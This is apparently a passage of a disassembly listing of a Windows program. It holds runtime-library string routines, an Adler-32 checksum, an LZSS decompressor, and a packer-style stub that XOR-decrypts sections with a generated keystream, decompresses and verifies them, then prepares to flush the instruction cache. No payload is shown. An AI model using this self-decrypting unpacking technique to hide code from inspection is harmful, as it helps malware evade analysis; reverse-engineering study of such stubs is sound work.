loc_48DC0E: ; CODE XREF: sub_48DA80+66�j
; sub_48DA80+B5�j ...
xor eax, eax
loc_48DC10: ; CODE XREF: sub_48DA80+AD�j
; sub_48DA80+21F�j
lea esp, [ebp-38h]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_48DC22: ; CODE XREF: sub_48DA80+160�j
mov [ebp+var_4], 1
lea eax, [esi+esi]
add eax, 3
and al, 0FCh
call sub_48DD90
mov [ebp+var_18], esp
mov ebx, esp
mov [ebp+var_20], ebx
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_48DC56
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
xor edi, edi
xor ebx, ebx
or [ebp+var_4], 0FFFFFFFFh
mov esi, [ebp+var_28]
loc_48DC56: ; CODE XREF: sub_48DA80+1C2�j
cmp ebx, edi
jz short loc_48DC0E
push esi
push ebx
push [ebp+var_1C]
push [ebp+var_24]
push [ebp+arg_4]
push [ebp+arg_0]
call ds:dword_49F034 ; LCMapStringW
test eax, eax
jz short loc_48DC0E
cmp [ebp+arg_14], edi
push edi
push edi
jnz short loc_48DC7D
push edi
push edi
jmp short loc_48DC83
; ---------------------------------------------------------------------------
loc_48DC7D: ; CODE XREF: sub_48DA80+1F7�j
push [ebp+arg_14]
push [ebp+arg_10]
loc_48DC83: ; CODE XREF: sub_48DA80+1FB�j
push esi
push ebx
push 220h
push [ebp+arg_18]
call ds:dword_49F040 ; WideCharToMultiByte
mov esi, eax
cmp esi, edi
jz loc_48DC0E
loc_48DC9D: ; CODE XREF: sub_48DA80+165�j
; sub_48DA80+188�j
mov eax, esi
jmp loc_48DC10
sub_48DA80 endp
; =============== S U B R O U T I N E =======================================
sub_48DCA4 proc near ; CODE XREF: sub_48DA80+81�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov edx, [esp+arg_4]
mov eax, [esp+arg_0]
test edx, edx
push esi
lea ecx, [edx-1]
jz short loc_48DCC1
loc_48DCB4: ; CODE XREF: sub_48DCA4+1B�j
cmp byte ptr [eax], 0
jz short loc_48DCC1
inc eax
mov esi, ecx
dec ecx
test esi, esi
jnz short loc_48DCB4
loc_48DCC1: ; CODE XREF: sub_48DCA4+E�j
; sub_48DCA4+13�j
cmp byte ptr [eax], 0
pop esi
jnz short loc_48DCCC
sub eax, [esp+arg_0]
retn
; ---------------------------------------------------------------------------
loc_48DCCC: ; CODE XREF: sub_48DCA4+21�j
mov eax, edx
retn
sub_48DCA4 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_48DCCF proc near ; CODE XREF: sub_48D86E+46�p
; sub_48D9EA+17�p ...
var_4 = byte ptr -4
var_3 = byte ptr -3
var_2 = byte ptr -2
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_0]
lea ecx, [eax+1]
cmp ecx, 100h
ja short loc_48DCED
mov ecx, ds:off_4A2450
movzx eax, word ptr [ecx+eax*2]
jmp short loc_48DD3F
; ---------------------------------------------------------------------------
loc_48DCED: ; CODE XREF: sub_48DCCF+10�j
mov ecx, eax
push esi
mov esi, ds:off_4A2450
sar ecx, 8
movzx edx, cl
test byte ptr [esi+edx*2+1], 80h
pop esi
jz short loc_48DD12
and [ebp+var_2], 0
mov [ebp+var_4], cl
mov [ebp+var_3], al
push 2
jmp short loc_48DD1B
; ---------------------------------------------------------------------------
loc_48DD12: ; CODE XREF: sub_48DCCF+33�j
and [ebp+var_3], 0
mov [ebp+var_4], al
push 1
loc_48DD1B: ; CODE XREF: sub_48DCCF+41�j
pop eax
lea ecx, [ebp+arg_0+2]
push 1
push 0
push 0
push ecx
push eax
lea eax, [ebp+var_4]
push eax
push 1
call sub_48DDBF
add esp, 1Ch
test eax, eax
jnz short loc_48DD3B
leave
retn
; ---------------------------------------------------------------------------
loc_48DD3B: ; CODE XREF: sub_48DCCF+68�j
movzx eax, word ptr [ebp+arg_0+2]
loc_48DD3F: ; CODE XREF: sub_48DCCF+1C�j
and eax, [ebp+arg_4]
leave
retn
sub_48DCCF endp
; ---------------------------------------------------------------------------
align 10h
mov eax, [esp+8]
mov ecx, [esp+10h]
or ecx, eax
mov ecx, [esp+0Ch]
jnz short loc_48DD69
mov eax, [esp+4]
mul ecx
retn 10h
; ---------------------------------------------------------------------------
loc_48DD69: ; CODE XREF: _4:0048DD5E�j
push ebx
mul ecx
mov ebx, eax
mov eax, [esp+8]
mul dword ptr [esp+14h]
add ebx, eax
mov eax, [esp+8]
mul ecx
add edx, ebx
pop ebx
retn 10h
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_48DD90 proc near ; CODE XREF: sub_48DA80+FD�p
; sub_48DA80+1B1�p ...
arg_0 = byte ptr 4
push ecx
cmp eax, 1000h
lea ecx, [esp+4+arg_0]
jb short loc_48DDB0
loc_48DD9C: ; CODE XREF: sub_48DD90+1E�j
sub ecx, 1000h
sub eax, 1000h
test [ecx], eax
cmp eax, 1000h
jnb short loc_48DD9C
loc_48DDB0: ; CODE XREF: sub_48DD90+A�j
sub ecx, eax
mov eax, esp
test [ecx], eax
mov esp, ecx
mov ecx, [eax]
mov eax, [eax+4]
push eax
retn
sub_48DD90 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_48DDBF proc near ; CODE XREF: sub_48DCCF+5E�p
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_49FB20
push offset sub_48D54C
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 18h
push ebx
push esi
push edi
mov [ebp+var_18], esp
mov eax, ds:dword_4A710C
xor ebx, ebx
cmp eax, ebx
jnz short loc_48DE2E
lea eax, [ebp+var_1C]
push eax
push 1
pop esi
push esi
push offset dword_49FB00
push esi
call ds:dword_49F048 ; GetStringTypeW
test eax, eax
jz short loc_48DE0C
mov eax, esi
jmp short loc_48DE29
; ---------------------------------------------------------------------------
loc_48DE0C: ; CODE XREF: sub_48DDBF+47�j
lea eax, [ebp+var_1C]
push eax
push esi
push offset dword_49FAFC
push esi
push ebx
call ds:dword_49F030 ; GetStringTypeA
test eax, eax
jz loc_48DEF4
push 2
pop eax
loc_48DE29: ; CODE XREF: sub_48DDBF+4B�j
mov ds:dword_4A710C, eax
loc_48DE2E: ; CODE XREF: sub_48DDBF+2F�j
cmp eax, 2
jnz short loc_48DE57
mov eax, [ebp+arg_14]
cmp eax, ebx
jnz short loc_48DE3F
mov eax, ds:dword_4A70F4
loc_48DE3F: ; CODE XREF: sub_48DDBF+79�j
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
push eax
call ds:dword_49F030 ; GetStringTypeA
jmp loc_48DEF6
; ---------------------------------------------------------------------------
loc_48DE57: ; CODE XREF: sub_48DDBF+72�j
cmp eax, 1
jnz loc_48DEF4
cmp [ebp+arg_10], ebx
jnz short loc_48DE6D
mov eax, ds:dword_4A7104
mov [ebp+arg_10], eax
loc_48DE6D: ; CODE XREF: sub_48DDBF+A4�j
push ebx
push ebx
push [ebp+arg_8]
push [ebp+arg_4]
mov eax, [ebp+arg_18]
neg eax
sbb eax, eax
and eax, 8
inc eax
push eax
push [ebp+arg_10]
call ds:dword_49F044 ; MultiByteToWideChar
mov [ebp+var_20], eax
cmp eax, ebx
jz short loc_48DEF4
mov [ebp+var_4], ebx
lea edi, [eax+eax]
mov eax, edi
add eax, 3
and al, 0FCh
call sub_48DD90
mov [ebp+var_18], esp
mov esi, esp
mov [ebp+var_24], esi
push edi
push ebx
push esi
call sub_48DF10
add esp, 0Ch
jmp short loc_48DEC3
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
xor ebx, ebx
xor esi, esi
loc_48DEC3: ; CODE XREF: sub_48DDBF+F7�j
or [ebp+var_4], 0FFFFFFFFh
cmp esi, ebx
jz short loc_48DEF4
push [ebp+var_20]
push esi
push [ebp+arg_8]
push [ebp+arg_4]
push 1
push [ebp+arg_10]
call ds:dword_49F044 ; MultiByteToWideChar
cmp eax, ebx
jz short loc_48DEF4
push [ebp+arg_C]
push eax
push esi
push [ebp+arg_0]
call ds:dword_49F048 ; GetStringTypeW
jmp short loc_48DEF6
; ---------------------------------------------------------------------------
loc_48DEF4: ; CODE XREF: sub_48DDBF+61�j
; sub_48DDBF+9B�j ...
xor eax, eax
loc_48DEF6: ; CODE XREF: sub_48DDBF+93�j
; sub_48DDBF+133�j
lea esp, [ebp-34h]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
sub_48DDBF endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_48DF10 proc near ; CODE XREF: sub_48DDBF+EF�p
arg_0 = dword ptr 4
arg_4 = byte ptr 8
arg_8 = dword ptr 0Ch
mov edx, [esp+arg_8]
mov ecx, [esp+arg_0]
test edx, edx
jz short loc_48DF63
xor eax, eax
mov al, [esp+arg_4]
push edi
mov edi, ecx
cmp edx, 4
jb short loc_48DF57
neg ecx
and ecx, 3
jz short loc_48DF39
sub edx, ecx
loc_48DF33: ; CODE XREF: sub_48DF10+27�j
mov [edi], al
inc edi
dec ecx
jnz short loc_48DF33
loc_48DF39: ; CODE XREF: sub_48DF10+1F�j
mov ecx, eax
shl eax, 8
add eax, ecx
mov ecx, eax
shl eax, 10h
add eax, ecx
mov ecx, edx
and edx, 3
shr ecx, 2
jz short loc_48DF57
rep stosd
test edx, edx
jz short loc_48DF5D
loc_48DF57: ; CODE XREF: sub_48DF10+18�j
; sub_48DF10+3F�j ...
mov [edi], al
inc edi
dec edx
jnz short loc_48DF57
loc_48DF5D: ; CODE XREF: sub_48DF10+45�j
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_48DF63: ; CODE XREF: sub_48DF10+A�j
mov eax, [esp+arg_0]
retn
sub_48DF10 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_48DF68 proc near ; CODE XREF: sub_48D454+13�p
jmp ds:dword_49F03C
sub_48DF68 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_48DF6E proc near ; CODE XREF: sub_48E2E0+183�p
; sub_48E2E0+361�p
; DATA XREF: ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
mov ecx, [ebp+arg_4]
push esi
push edi
mov edi, [ebp+arg_0]
mov esi, edi
and esi, 0FFFFh
shr edi, 10h
test ecx, ecx
jnz short loc_48DF90
push 1
pop eax
jmp loc_48E083
; ---------------------------------------------------------------------------
loc_48DF90: ; CODE XREF: sub_48DF6E+18�j
cmp [ebp+arg_8], 0
jbe loc_48E07C
push ebx
loc_48DF9B: ; CODE XREF: sub_48DF6E+107�j
mov edx, 15B0h
cmp [ebp+arg_8], edx
jnb short loc_48DFA8
mov edx, [ebp+arg_8]
loc_48DFA8: ; CODE XREF: sub_48DF6E+35�j
sub [ebp+arg_8], edx
cmp edx, 10h
jl loc_48E04B
mov eax, edx
shr eax, 4
mov ebx, eax
neg ebx
shl ebx, 4
add edx, ebx
loc_48DFC2: ; CODE XREF: sub_48DF6E+D7�j
movzx ebx, byte ptr [ecx]
add esi, ebx
movzx ebx, byte ptr [ecx+1]
add edi, esi
add esi, ebx
movzx ebx, byte ptr [ecx+2]
add edi, esi
add esi, ebx
movzx ebx, byte ptr [ecx+3]
add edi, esi
add esi, ebx
movzx ebx, byte ptr [ecx+4]
add edi, esi
add esi, ebx
movzx ebx, byte ptr [ecx+5]
add edi, esi
add esi, ebx
movzx ebx, byte ptr [ecx+6]
add edi, esi
add esi, ebx
movzx ebx, byte ptr [ecx+7]
add edi, esi
add esi, ebx
movzx ebx, byte ptr [ecx+8]
add edi, esi
add esi, ebx
movzx ebx, byte ptr [ecx+9]
add edi, esi
add esi, ebx
movzx ebx, byte ptr [ecx+0Ah]
add edi, esi
add esi, ebx
movzx ebx, byte ptr [ecx+0Bh]
add edi, esi
add esi, ebx
movzx ebx, byte ptr [ecx+0Ch]
add edi, esi
add esi, ebx
movzx ebx, byte ptr [ecx+0Dh]
add edi, esi
add esi, ebx
movzx ebx, byte ptr [ecx+0Eh]
add edi, esi
add esi, ebx
movzx ebx, byte ptr [ecx+0Fh]
add edi, esi
add esi, ebx
add edi, esi
add ecx, 10h
dec eax
jnz loc_48DFC2
loc_48E04B: ; CODE XREF: sub_48DF6E+40�j
test edx, edx
jz short loc_48E05A
loc_48E04F: ; CODE XREF: sub_48DF6E+EA�j
movzx eax, byte ptr [ecx]
add esi, eax
inc ecx
add edi, esi
dec edx
jnz short loc_48E04F
loc_48E05A: ; CODE XREF: sub_48DF6E+DF�j
mov ebx, 0FFF1h
mov eax, esi
xor edx, edx
mov esi, ebx
div esi
mov eax, edi
mov esi, edx
xor edx, edx
div ebx
cmp [ebp+arg_8], 0
mov edi, edx
ja loc_48DF9B
pop ebx
loc_48E07C: ; CODE XREF: sub_48DF6E+26�j
mov eax, edi
shl eax, 10h
or eax, esi
loc_48E083: ; CODE XREF: sub_48DF6E+1D�j
pop edi
pop esi
pop ebp
retn
sub_48DF6E endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_48E090 proc near ; CODE XREF: sub_48E2E0+15E�p
; sub_48E2E0+33C�p
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 1Ch
mov [ebp+var_1C], ecx
mov eax, [ebp+var_1C]
mov ecx, [ebp+arg_0]
mov [eax], ecx
mov edx, [ebp+var_1C]
mov eax, [ebp+arg_8]
mov [edx+4], eax
mov ecx, [ebp+var_1C]
mov edx, [ebp+arg_4]
mov [ecx+8], edx
mov eax, [ebp+var_1C]
mov ecx, [ebp+arg_C]
mov [eax+0Ch], ecx
mov edx, [ebp+var_1C]
mov dword ptr [edx+14h], 0
mov eax, [ebp+var_1C]
mov dword ptr [eax+10h], 0
mov [ebp+var_10], 0
jmp short loc_48E0E2
; ---------------------------------------------------------------------------
loc_48E0D9: ; CODE XREF: sub_48E090+65�j
mov ecx, [ebp+var_10]
add ecx, 1
mov [ebp+var_10], ecx
loc_48E0E2: ; CODE XREF: sub_48E090+47�j
cmp [ebp+var_10], 0FEEh
jge short loc_48E0F7
mov edx, [ebp+var_1C]
add edx, [ebp+var_10]
mov byte ptr [edx+18h], 20h
jmp short loc_48E0D9
; ---------------------------------------------------------------------------
loc_48E0F7: ; CODE XREF: sub_48E090+59�j
mov [ebp+var_8], 0FEEh
mov [ebp+var_4], 0
loc_48E105: ; CODE XREF: sub_48E090:loc_48E236�j
mov eax, [ebp+var_4]
shr eax, 1
mov [ebp+var_4], eax
mov ecx, [ebp+var_4]
and ecx, 100h
test ecx, ecx
jnz short loc_48E139
mov ecx, [ebp+var_1C]
call sub_48E250
mov [ebp+var_C], eax
cmp [ebp+var_C], 0FFFFFFFFh
jnz short loc_48E130
jmp loc_48E23B
; ---------------------------------------------------------------------------
loc_48E130: ; CODE XREF: sub_48E090+99�j
mov edx, [ebp+var_C]
or dh, 0FFh
mov [ebp+var_4], edx
loc_48E139: ; CODE XREF: sub_48E090+88�j
mov eax, [ebp+var_4]
and eax, 1
test eax, eax
jz short loc_48E18A
mov ecx, [ebp+var_1C]
call sub_48E250
mov [ebp+var_C], eax
cmp [ebp+var_C], 0FFFFFFFFh
jnz short loc_48E159
jmp loc_48E23B
; ---------------------------------------------------------------------------
loc_48E159: ; CODE XREF: sub_48E090+C2�j
mov edx, [ebp+var_C]
mov ecx, [ebp+var_1C]
call sub_48E290
mov ecx, [ebp+var_1C]
add ecx, [ebp+var_8]
mov dl, byte ptr [ebp+var_C]
mov [ecx+18h], dl
mov eax, [ebp+var_8]
add eax, 1
mov [ebp+var_8], eax
mov ecx, [ebp+var_8]
and ecx, 0FFFh
mov [ebp+var_8], ecx
jmp loc_48E236
; ---------------------------------------------------------------------------
loc_48E18A: ; CODE XREF: sub_48E090+B1�j
mov ecx, [ebp+var_1C]
call sub_48E250
mov [ebp+var_10], eax
cmp [ebp+var_10], 0FFFFFFFFh
jnz short loc_48E1A0
jmp loc_48E23B
; ---------------------------------------------------------------------------
loc_48E1A0: ; CODE XREF: sub_48E090+109�j
mov ecx, [ebp+var_1C]
call sub_48E250
mov [ebp+var_14], eax
cmp [ebp+var_14], 0FFFFFFFFh
jnz short loc_48E1B6
jmp loc_48E23B
; ---------------------------------------------------------------------------
loc_48E1B6: ; CODE XREF: sub_48E090+11F�j
mov edx, [ebp+var_14]
and edx, 0F0h
shl edx, 4
mov eax, [ebp+var_10]
or eax, edx
mov [ebp+var_10], eax
mov ecx, [ebp+var_14]
and ecx, 0Fh
add ecx, 2
mov [ebp+var_14], ecx
mov [ebp+var_18], 0
jmp short loc_48E1E8
; ---------------------------------------------------------------------------
loc_48E1DF: ; CODE XREF: sub_48E090+1A4�j
mov edx, [ebp+var_18]
add edx, 1
mov [ebp+var_18], edx
loc_48E1E8: ; CODE XREF: sub_48E090+14D�j
mov eax, [ebp+var_18]
cmp eax, [ebp+var_14]
jg short loc_48E236
mov ecx, [ebp+var_10]
add ecx, [ebp+var_18]
and ecx, 0FFFh
mov edx, [ebp+var_1C]
xor eax, eax
mov al, [edx+ecx+18h]
mov [ebp+var_C], eax
mov edx, [ebp+var_C]
mov ecx, [ebp+var_1C]
call sub_48E290
mov ecx, [ebp+var_1C]
add ecx, [ebp+var_8]
mov dl, byte ptr [ebp+var_C]
mov [ecx+18h], dl
mov eax, [ebp+var_8]
add eax, 1
mov [ebp+var_8], eax
mov ecx, [ebp+var_8]
and ecx, 0FFFh
mov [ebp+var_8], ecx
jmp short loc_48E1DF
; ---------------------------------------------------------------------------
loc_48E236: ; CODE XREF: sub_48E090+F5�j
; sub_48E090+15E�j
jmp loc_48E105
; ---------------------------------------------------------------------------
loc_48E23B: ; CODE XREF: sub_48E090+9B�j
; sub_48E090+C4�j ...
mov edx, [ebp+var_1C]
mov eax, [edx+10h]
mov esp, ebp
pop ebp
retn 10h
sub_48E090 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_48E250 proc near ; CODE XREF: sub_48E090+8D�p
; sub_48E090+B6�p ...
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], ecx
mov eax, [ebp+var_4]
mov ecx, [ebp+var_4]
mov edx, [eax+14h]
cmp edx, [ecx+8]
jb short loc_48E26A
or eax, 0FFFFFFFFh
jmp short loc_48E28B
; ---------------------------------------------------------------------------
loc_48E26A: ; CODE XREF: sub_48E250+13�j
mov eax, [ebp+var_4]
mov ecx, [eax]
mov edx, [ebp+var_4]
mov eax, [edx+14h]
xor edx, edx
mov dl, [ecx+eax]
mov eax, edx
mov ecx, [ebp+var_4]
mov edx, [ecx+14h]
add edx, 1
mov ecx, [ebp+var_4]
mov [ecx+14h], edx
loc_48E28B: ; CODE XREF: sub_48E250+18�j
mov esp, ebp
pop ebp
retn
sub_48E250 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_48E290 proc near ; CODE XREF: sub_48E090+CF�p
; sub_48E090+17E�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 8
mov [ebp+var_8], edx
mov [ebp+var_4], ecx
mov eax, [ebp+var_4]
mov ecx, [ebp+var_4]
mov edx, [eax+10h]
cmp edx, [ecx+0Ch]
jb short loc_48E2AC
jmp short loc_48E2CD
; ---------------------------------------------------------------------------
loc_48E2AC: ; CODE XREF: sub_48E290+18�j
mov eax, [ebp+var_4]
mov ecx, [eax+4]
mov edx, [ebp+var_4]
mov eax, [edx+10h]
mov dl, byte ptr [ebp+var_8]
mov [ecx+eax], dl
mov eax, [ebp+var_4]
mov ecx, [eax+10h]
add ecx, 1
mov edx, [ebp+var_4]
mov [edx+10h], ecx
loc_48E2CD: ; CODE XREF: sub_48E290+1A�j
mov esp, ebp
pop ebp
retn
sub_48E290 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_48E2E0 proc near ; CODE XREF: _4:loc_48E700�p
var_70 = dword ptr -70h
var_6C = dword ptr -6Ch
var_68 = dword ptr -68h
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_5C = dword ptr -5Ch
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 70h
push esi
push edi
push 0
call ds:dword_49F014 ; GetModuleHandleA
mov [ebp+var_18], eax
push 0D440h
push 40h
call ds:dword_49F010 ; LocalAlloc
mov [ebp+var_8], eax
mov eax, [ebp+arg_4]
sub eax, 3FAh
mov [ebp+var_4], eax
mov ecx, [ebp+var_4]
sub ecx, 4
mov [ebp+var_10], ecx
mov [ebp+var_1C], 0
mov [ebp+var_44], 1
mov [ebp+var_30], 0
mov [ebp+var_3C], offset aBarier ; "BARIER"
loc_48E333: ; CODE XREF: sub_48E2E0+98�j
; sub_48E2E0+A0�j
mov edx, [ebp+var_10]
mov eax, [edx]
imul eax, 28h
mov ecx, [ebp+var_4]
add ecx, eax
mov edx, [ebp+var_44]
imul edx, 28h
sub ecx, edx
mov [ebp+var_30], ecx
mov eax, [ebp+var_44]
add eax, 1
mov [ebp+var_44], eax
mov ecx, [ebp+var_30]
mov edx, [ebp+var_18]
add edx, [ecx+0Ch]
mov [ebp+var_40], edx
mov eax, [ebp+var_30]
mov ecx, [ebp+var_18]
add ecx, [eax+0Ch]
mov edx, [ebp+var_30]
add ecx, [edx+8]
mov [ebp+var_2C], ecx
mov eax, [ebp+var_40]
cmp eax, [ebp+var_3C]
ja short loc_48E333
mov ecx, [ebp+var_3C]
cmp ecx, [ebp+var_2C]
jnb short loc_48E333
mov edx, [ebp+var_40]
mov [ebp+var_20], edx
jmp short loc_48E393
; ---------------------------------------------------------------------------
loc_48E38A: ; CODE XREF: sub_48E2E0+DA�j
mov eax, [ebp+var_40]
add eax, 4
mov [ebp+var_40], eax
loc_48E393: ; CODE XREF: sub_48E2E0+A8�j
mov ecx, [ebp+var_40]
cmp ecx, [ebp+var_2C]
jnb short loc_48E3BC
mov edx, [ebp+var_20]
imul edx, 19660Dh
add edx, 3C6EF375h
mov [ebp+var_20], edx
mov eax, [ebp+var_40]
mov ecx, [eax]
xor ecx, [ebp+var_20]
mov edx, [ebp+var_40]
mov [edx], ecx
jmp short loc_48E38A
; ---------------------------------------------------------------------------
loc_48E3BC: ; CODE XREF: sub_48E2E0+B9�j
mov eax, [ebp+var_30]
mov ecx, [ebp+var_18]
add ecx, [eax+0Ch]
mov [ebp+var_24], ecx
mov edx, [ebp+var_24]
mov eax, [edx]
mov [ebp+var_28], eax
mov ecx, [ebp+var_24]
mov edx, [ecx+4]
mov [ebp+var_38], edx
mov eax, [ebp+var_24]
mov ecx, [eax+8]
mov [ebp+var_34], ecx
mov edx, [ebp+var_38]
push edx
push 40h
call ds:dword_49F010 ; LocalAlloc
mov [ebp+var_1C], eax
cmp [ebp+var_1C], 0
jz short loc_48E400
cmp [ebp+var_38], 10000h
jbe short loc_48E411
loc_48E400: ; CODE XREF: sub_48E2E0+115�j
push 0
push 0
push 0
push 0EF0000FEh
call ds:dword_49F00C ; RaiseException
loc_48E411: ; CODE XREF: sub_48E2E0+11E�j
mov ecx, [ebp+var_38]
mov esi, [ebp+var_24]
add esi, 0Ch
mov edi, [ebp+var_1C]
mov eax, ecx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
mov ecx, [ebp+var_28]
push ecx
mov edx, [ebp+var_24]
push edx
mov eax, [ebp+var_38]
push eax
mov ecx, [ebp+var_1C]
push ecx
mov ecx, [ebp+var_8]
call sub_48E090
cmp eax, [ebp+var_28]
jz short loc_48E459
push 0
push 0
push 0
push 0EF0000F8h
call ds:dword_49F00C ; RaiseException
loc_48E459: ; CODE XREF: sub_48E2E0+166�j
mov edx, [ebp+var_28]
push edx
mov eax, [ebp+var_24]
push eax
push 0
call sub_48DF6E
add esp, 0Ch
cmp eax, [ebp+var_34]
jz short loc_48E481
push 0
push 0
push 0
push 0EF0000FAh
call ds:dword_49F00C ; RaiseException
loc_48E481: ; CODE XREF: sub_48E2E0+18E�j
mov ecx, [ebp+var_1C]
push ecx
call ds:dword_49F008 ; LocalFree
push offset aKernel32_dll ; "kernel32.dll"
call ds:dword_49F014 ; GetModuleHandleA
mov [ebp+var_C], eax
cmp [ebp+var_C], 0
jnz short loc_48E4B0
push 0
push 0
push 0
push 0EF0000FDh
call ds:dword_49F00C ; RaiseException
loc_48E4B0: ; CODE XREF: sub_48E2E0+1BD�j
push offset aFlushinstructi ; "FlushInstructionCache"
mov edx, [ebp+var_C]
push edx
call ds:dword_49F004 ; GetProcAddress
mov ds:dword_4A2670, eax
push offset aGetcurrentproc ; "GetCurrentProcess"
mov eax, [ebp+var_C]
push eax
call ds:dword_49F004 ; GetProcAddress
mov [ebp+var_14], eax
cmp ds:dword_4A2670, 0
jnz short loc_48E4F0
push 0
push 0
push 0
push 0EF0000FCh
call ds:dword_49F00C ; RaiseException
loc_48E4F0: ; CODE XREF: sub_48E2E0+1FD�j
call [ebp+var_14]
mov ds:dword_4A268C, eax
mov [ebp+var_48], 0
mov [ebp+var_68], 3
mov [ebp+var_58], 0
loc_48E50D: ; CODE XREF: sub_48E2E0+272�j
; sub_48E2E0+27A�j
mov ecx, [ebp+var_10]
mov edx, [ecx]
imul edx, 28h
mov eax, [ebp+var_4]
add eax, edx
mov ecx, [ebp+var_68]
imul ecx, 28h
sub eax, ecx
mov [ebp+var_58], eax
mov edx, [ebp+var_68]
add edx, 1
mov [ebp+var_68], edx
mov eax, [ebp+var_58]
mov ecx, [ebp+var_18]
add ecx, [eax+0Ch]
mov [ebp+var_64], ecx
mov edx, [ebp+var_58]
mov eax, [ebp+var_18]
add eax, [edx+0Ch]
mov ecx, [ebp+var_58]
add eax, [ecx+8]
mov [ebp+var_54], eax
mov edx, [ebp+var_64]
cmp edx, [ebp+arg_0]
jnb short loc_48E50D
mov eax, [ebp+arg_0]
cmp eax, [ebp+var_54]
jnb short loc_48E50D
mov ecx, [ebp+arg_0]
mov [ebp+var_64], ecx
mov edx, [ebp+var_64]
mov [ebp+var_4C], edx
mov eax, [ebp+var_64]
add eax, 0Ch
and al, 0FCh
mov [ebp+var_64], eax
jmp short loc_48E57E
; ---------------------------------------------------------------------------
loc_48E575: ; CODE XREF: sub_48E2E0+2C4�j
mov ecx, [ebp+var_64]
add ecx, 4
mov [ebp+var_64], ecx
loc_48E57E: ; CODE XREF: sub_48E2E0+293�j
mov edx, [ebp+var_64]
cmp edx, [ebp+var_54]
jnb short loc_48E5A6
mov eax, [ebp+var_4C]
imul eax, 19660Dh
add eax, 3C6EF375h
mov [ebp+var_4C], eax
mov ecx, [ebp+var_64]
mov edx, [ecx]
xor edx, [ebp+var_4C]
mov eax, [ebp+var_64]
mov [eax], edx
jmp short loc_48E575
; ---------------------------------------------------------------------------
loc_48E5A6: ; CODE XREF: sub_48E2E0+2A4�j
mov ecx, [ebp+arg_0]
mov edx, [ecx]
mov [ebp+var_50], edx
mov eax, [ebp+arg_0]
mov ecx, [eax+4]
mov [ebp+var_60], ecx
mov edx, [ebp+arg_0]
mov eax, [edx+8]
mov [ebp+var_5C], eax
mov ecx, [ebp+var_60]
push ecx
push 40h
call ds:dword_49F010 ; LocalAlloc
mov [ebp+var_48], eax
cmp [ebp+var_48], 0
jz short loc_48E5DE
cmp [ebp+var_60], 10000h
jbe short loc_48E5EF
loc_48E5DE: ; CODE XREF: sub_48E2E0+2F3�j
push 0
push 0
push 0
push 0EF0000FFh
call ds:dword_49F00C ; RaiseException
loc_48E5EF: ; CODE XREF: sub_48E2E0+2FC�j
mov ecx, [ebp+var_60]
mov esi, [ebp+arg_0]
add esi, 0Ch
mov edi, [ebp+var_48]
mov edx, ecx
shr ecx, 2
rep movsd
mov ecx, edx
and ecx, 3
rep movsb
mov eax, [ebp+var_50]
push eax
mov ecx, [ebp+arg_0]
push ecx
mov edx, [ebp+var_60]
push edx
mov eax, [ebp+var_48]
push eax
